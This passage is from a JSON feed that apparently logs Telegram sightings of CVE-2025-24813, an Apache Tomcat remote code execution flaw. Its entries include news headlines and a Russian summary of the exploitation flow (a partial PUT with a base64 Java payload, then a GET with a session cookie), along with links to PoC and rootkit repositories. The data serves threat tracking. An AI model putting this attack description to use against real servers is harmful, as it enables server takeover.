\u0645\u06cc\u062f\u0647.\n\n#\u0622\u0633\u06cc\u0628_\u067e\u0630\u06cc\u0631\u06cc_\u0627\u0645\u0646\u06cc\u062a\u06cc \n#CVE #ApacheTomcat #RCE \n\n\ud83c\udd94 @onhex_ir\n\u27a1\ufe0f ALL Link", "creation_timestamp": "2025-03-13T08:27:31.000000Z"}, {"uuid": "51869a42-871a-4258-85f9-2a557dee382c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/TengkorakCyberCrewzz/29156", "content": "Hackers Actively Exploit Apache Tomcat Servers via CVE-2025-24813 \u2013 Patch Now \u2013 gbhackers.com\n\nFri, 21 Mar 2025 19:11:23", "creation_timestamp": "2025-03-21T13:04:33.000000Z"}, {"uuid": "32358b10-155f-4e49-8bc7-dcf351b64801", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/3-ZHnGIziHQfiAv_nnRcq-K1CX5YmX9HY0dHsXamLuxzSs0", "content": "", "creation_timestamp": "2025-04-09T23:00:06.000000Z"}, {"uuid": "a45fc799-bbc4-4b2c-954c-36b1fbc6df70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/ZpVAfw2CiVb5XMhEA9ntELCWH_8t6W6x35utQuuSR7npxQQ", "content": "", "creation_timestamp": "2025-04-08T05:00:07.000000Z"}, {"uuid": "ff423197-c6f7-46a0-ac5d-78617e5c8d0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/2Mv-2iki26E7M91NoHSItb85uE7hmbSk_CGlhbCKtUOV7I0", "content": "", "creation_timestamp": "2025-04-05T17:00:10.000000Z"}, {"uuid": "d5bbd097-6c56-4670-950f-b8f61d32caa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/9LVGSk6wVw0IWhEGPHpvxSTJTnKNt02SSt_xE5fqoYcZYJA", "content": "", "creation_timestamp": "2025-03-14T20:00:08.000000Z"}, {"uuid": "12d7d3a5-94b9-43ac-8004-f513bdb8ed4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/t4W2qGLDrPTh4ylfVSi32sIJvO37xNh95ZguxDMzeYbNCQs", "content": "", "creation_timestamp": "2025-03-13T16:00:07.000000Z"}, {"uuid": "856533b7-18e7-475e-af9d-3f8c51849520", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/025r9Ac4mA6AzmYH4V_5jxzygPRuLIkjd6NMrYR-gf6fiv4", "content": "", "creation_timestamp": "2025-04-18T17:00:10.000000Z"}, {"uuid": "e3425382-8827-41ea-ba1d-890ca68f761d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/pWd9X9O-wxNFHc7yjrFxacF5_Xwtq-UoHUpwNipx7ufI6ko", "content": "", "creation_timestamp": "2025-03-14T10:00:06.000000Z"}, {"uuid": "fc3669f0-8e9c-467f-9bf4-2b66b40af8f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/02VwLT3-alMBHMrurAdso0o-X_elsf90vyEBHIsSiJpLnKI", "content": "", "creation_timestamp": "2025-03-14T08:00:09.000000Z"}, {"uuid": "e2543355-b7a4-4a4a-997b-1ba4db887e08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/pg7kvtgf18i2NSpY74T8eUGfUmlZbISb88s-xMWif3Xt7vA", "content": "", "creation_timestamp": "2025-03-14T16:00:08.000000Z"}, {"uuid": "2113ec9b-b12c-48c5-b0a3-fff3182188c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "Telegram/Uq-nYUAbPQym8dtJVJFG1DEELRh97NOGT3ieRAr2exNNXBo", "content": "", "creation_timestamp": "2025-03-12T09:31:15.000000Z"}, {"uuid": "84629a4b-332a-4b5d-84ba-e48633201f2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/I7jR8-nuB9vORcoqYQEKVbRbgCypJUG-yRbHBYfDVMuFag4", "content": "", "creation_timestamp": "2025-03-18T16:00:16.000000Z"}, {"uuid": "608708f4-375b-4e70-a4b3-7c99b6ba6bf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/YBrr9bnrMsHvjVMlNhE_R_T9Bu1Hec2ynwQC5xZi-avV8gw", "content": "", "creation_timestamp": "2025-03-20T04:00:07.000000Z"}, {"uuid": "7470178f-62b9-4ddf-bbba-d78a8374c028", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/MOyk5MLPuIFPQS1mjI720DgTYnW-ICPm73rDvqyoUuMx8VY", "content": "", "creation_timestamp": "2025-03-18T16:00:09.000000Z"}, {"uuid": "1211b2c7-10b6-4a77-9ac3-954bc2fc1459", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/PwwJAzTb-IdG19a4lkKUuUkLQSIKKrHtPLjHlAbBLV6HlJc", "content": "", "creation_timestamp": "2025-03-25T04:00:08.000000Z"}, {"uuid": "17648552-830d-4054-8bd0-bcc9c5d05300", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/YkV8t1LCoFDP_LiinWajN0XdojCXwmEcwxesvfXvd8WmcUc", "content": "", "creation_timestamp": "2025-03-17T10:00:06.000000Z"}, {"uuid": "c29d07d2-6193-4c77-979b-cd9d1afaca76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/RFELXp7UwD6Vp7JHUr5BYkSzkfOrvFk2TEPoPzivoxKdsYg", "content": "", "creation_timestamp": "2025-03-17T09:39:15.000000Z"}, {"uuid": "ae2aa30f-4228-45e2-b275-73597c569eb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/NEW4pcU90q5B_s6yFbFP2Kt8zY1ba7u3tPYDdw-smW-WS38", "content": "", "creation_timestamp": "2025-03-17T08:00:10.000000Z"}, {"uuid": "13b85924-73e3-4a8c-bb70-1b6b36d03616", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/ThXju2ZMT_612yASJRrFQJIKnYK5F6XY7q6en3PVZ2DGB64", "content": "", "creation_timestamp": "2025-03-21T04:00:08.000000Z"}, {"uuid": "c03c8053-7173-4942-b4a8-c8779053d11a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/wSGzmOjLrmEcQmMBXaHVXNxUHoaomU1r4hfeqWwSlXhrWUk", "content": "", "creation_timestamp": "2025-03-19T22:00:06.000000Z"}, {"uuid": "94bec1b1-8b4b-4fe3-891e-8132beb5572e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "Telegram/Dx7vZWH_LM_56yZN0c2ZxaqMC9NEHIV5QZXHh3bHlYxpHQ0", "content": "", "creation_timestamp": "2025-03-16T16:00:09.000000Z"}, {"uuid": "916a6854-3657-4f49-9d2d-b0fbab62c565", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/0GfCOzXtqvFdrqIAVQZHiIyuC3I1uZNIHuukwGa3RPYAk8Y", "content": "", "creation_timestamp": "2025-03-24T22:00:08.000000Z"}, {"uuid": "3cd4c50b-4490-4e45-911e-0b48e4527154", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/CbtgHq16D2WzZv5CTdyVvXDcyFh0C0J5JL3g7K1HrWQaRx0", "content": "", "creation_timestamp": "2025-03-22T04:00:07.000000Z"}, {"uuid": "111b656e-8a2c-4c82-b02f-23021cf6f215", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/b9uKhD1fwBkinGCQMJCbbfFx-Z3RPQ1IsiIIeMCJfCBemDM", "content": "", "creation_timestamp": "2025-03-18T04:00:07.000000Z"}, {"uuid": "5da9c6a1-9329-4826-b0ff-ca26a270b7f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/zero_day_uz/474", "content": "CVE-2025-24813 Apache Tomcat RCE\n*", "creation_timestamp": "2025-03-16T13:59:18.000000Z"}, {"uuid": "fe5d1ce4-3183-4f6f-9e07-99425089613c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2541", "content": "CVE-2025-24813 Apache Tomcat RCE\n*", "creation_timestamp": "2025-03-13T17:32:51.000000Z"}, {"uuid": "6cb90c38-4fa9-45a2-9b50-8633002db3e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8080", "content": "#GitHub #Tools\n\nPublic malware techniques used in the wild: Virtual Machine, Emulation, Debuggers, Sandbox detection.\n\nhttps://github.com/ayoubfaouzi/al-khaser\n\nFileless ring 3 rootkit with installer and persistence that hides processes, files, network connections, etc.\n\nhttps://github.com/bytecode77/r77-rootkit\n\nApache Tomcat \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u6279\u91cf\u68c0\u6d4b\u811a\u672c(CVE-2025-24813)\n\nhttps://github.com/iSee857/CVE-2025-24813-PoC\n\nCRADLE is a collaborative platform for Cyber Threat Intelligence analysts. It streamlines threat investigations with integrated note-taking, automated data linking, interactive visualizations, and robust access control. Enhance your CTI workflow from analysis to reporting\u2014all in one secure space.\n\nhttps://github.com/prodaft/cradle\n\n#HackersFactory", "creation_timestamp": "2025-03-19T10:09:01.000000Z"}, {"uuid": "b7126334-96bb-4441-86d6-3e615bcb9748", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1702", "content": "Path Equivalence- 'file.Name' (Internal Dot) leading to\u00a0Remote Code Execution and/or Information disclosure\u00a0and/or malicious content added to uploaded files via write enabled\u00a0Default Servlet\u00a0in Apache Tomcat.", "creation_timestamp": "2025-03-16T14:00:01.000000Z"}, {"uuid": "97899bae-3ae6-49af-8cb1-9de7a6d33285", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/information_security_channel/53254", "content": "Exploit Code for Apache Tomcat RCE Vulnerability Published on Chinese Forum\nhttps://www.securityweek.com/exploit-code-for-apache-tomcat-rce-vulnerability-published-on-chinese-forum/\n\nExploits swirling for remote code execution vulnerability (CVE-2025-24813) in open-source Apache Tomcat web server.\nThe post Exploit Code for Apache Tomcat RCE Vulnerability Published on Chinese Forum (https://www.securityweek.com/exploit-code-for-apache-tomcat-rce-vulnerability-published-on-chinese-forum/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2025-03-17T20:59:10.000000Z"}, {"uuid": "fb8b15a0-23fb-4851-b7a1-9621a3244de1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/true_secator/6850", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Apache Tomcat, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a CVE-2025-24813, \u0442\u0435\u043f\u0435\u0440\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0440\u043e\u0441\u0442\u043e\u0433\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430 PUT.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043d\u0430 GitHub \u0432\u0441\u0435\u0433\u043e \u0447\u0435\u0440\u0435\u0437 30 \u0447\u0430\u0441\u043e\u0432 \u043f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435.\n\n\u041e\u043d\u0430 \u0431\u044b\u043b\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 Apache \u0432 \u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a 10 \u043c\u0430\u0440\u0442\u0430 2025 \u0433\u043e\u0434\u0430 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 Apache Tomcat \u0432\u0435\u0440\u0441\u0438\u0439 11.0.0-M1\u201311.0.2, 10.1.0-M1\u201310.1.34 \u0438 9.0.0.M1\u20139.0.98.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Wallarm \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c, \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044f, \u0447\u0442\u043e \u0442\u0440\u0430\u0434\u0438\u0446\u0438\u043e\u043d\u043d\u044b\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043d\u0435 \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u044b \u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0437\u0430\u043f\u0440\u043e\u0441\u044b PUT \u0432\u044b\u0433\u043b\u044f\u0434\u044f\u0442 \u0432\u043f\u043e\u043b\u043d\u0435 \u0435\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0435\u043d\u0442 \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0438 base64.\n\n\u0412 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 PUT, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u0432 base64 \u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 Java, \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u043d\u0443\u044e \u0432 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435 \u0441\u0435\u0430\u043d\u0441\u043e\u0432 Tomcat.\n\n\u0417\u0430\u0442\u0435\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 GET \u0441 cookie-\u0444\u0430\u0439\u043b\u043e\u043c JSESSIONID, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u043c \u043d\u0430 \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0441\u0435\u0430\u043d\u0441\u0430, \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u044f Tomcat \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 Java, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c.\n\n\u0410\u0442\u0430\u043a\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u0430, \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u0442\u0435\u043c, \u0447\u0442\u043e Tomcat \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b PUT \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442 \u0441\u0435\u0430\u043d\u0441 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e.\n\n\u0415\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0435 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e\u0431\u044b Tomcat \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0435 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435 \u0441\u0435\u0430\u043d\u0441\u043e\u0432, \u0447\u0442\u043e \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0431\u044b\u0447\u043d\u044b\u043c \u044f\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0432\u043e \u043c\u043d\u043e\u0433\u0438\u0445 \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f\u0445.\n\nApache \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u0432\u0441\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0439 Tomcat 11.0.3+, 10.1.35+ \u0438\u043b\u0438 9.0.99+, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f CVE-2025-24813.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Tomcat \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0433\u0443\u0442 \u0440\u0435\u0448\u0438\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u0432\u0435\u0440\u043d\u0443\u0432\u0448\u0438\u0441\u044c \u043a \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0441\u0435\u0440\u0432\u043b\u0435\u0442\u0430 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e (readonly= \"true\"), \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0432 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u0443\u044e \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0443 PUT \u0438 \u0438\u0437\u0431\u0435\u0433\u0430\u044f \u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u043f\u043e\u0434\u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430\u0445 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u043f\u0443\u0442\u0435\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438.\n\n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Wallarm \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439 \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0435 \u0441\u0430\u043c\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f, \u0430 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u043e\u043b\u044c\u0448\u0435\u0433\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0430 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u044e\u0449\u0438\u0445 \u0438\u0437-\u0437\u0430 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 PUT \u0432 Tomcat.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043d\u0430\u0447\u043d\u0443\u0442 \u043c\u0435\u043d\u044f\u0442\u044c \u0442\u0430\u043a\u0442\u0438\u043a\u0443, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b JSP, \u0438\u0437\u043c\u0435\u043d\u044f\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0438 \u0440\u0430\u0437\u043c\u0435\u0449\u0430\u044f \u0431\u044d\u043a\u0434\u043e\u0440\u044b \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u0430\u043c\u0438 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0430 \u0441\u0435\u0430\u043d\u0441\u043e\u0432, \u0442\u0430\u043a \u0447\u0442\u043e \u0442\u0435\u043a\u0443\u0449\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f - \u044d\u0442\u043e \u043b\u0438\u0448\u044c \u043f\u0435\u0440\u0432\u0430\u044f \u0432\u043e\u043b\u043d\u0430, \u043f\u043e \u0438\u0445 \u043c\u043d\u0435\u043d\u0438\u044e.\n\n\u041d\u043e \u0431\u0443\u0434\u0435\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c.", "creation_timestamp": "2025-03-18T11:40:05.000000Z"}, {"uuid": "59bc550d-a673-4354-b1d6-7209e281283b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/T-_K-PJ-Vo7ZUWhJQQWXmj0izyIt8dnCmdBUAy9wO20y3cQ", "content": "", "creation_timestamp": "2025-03-17T09:39:16.000000Z"}, {"uuid": "79c41af1-fd8b-4605-9ffb-bf77516a65c9", "vulnerability_lookup_origin": 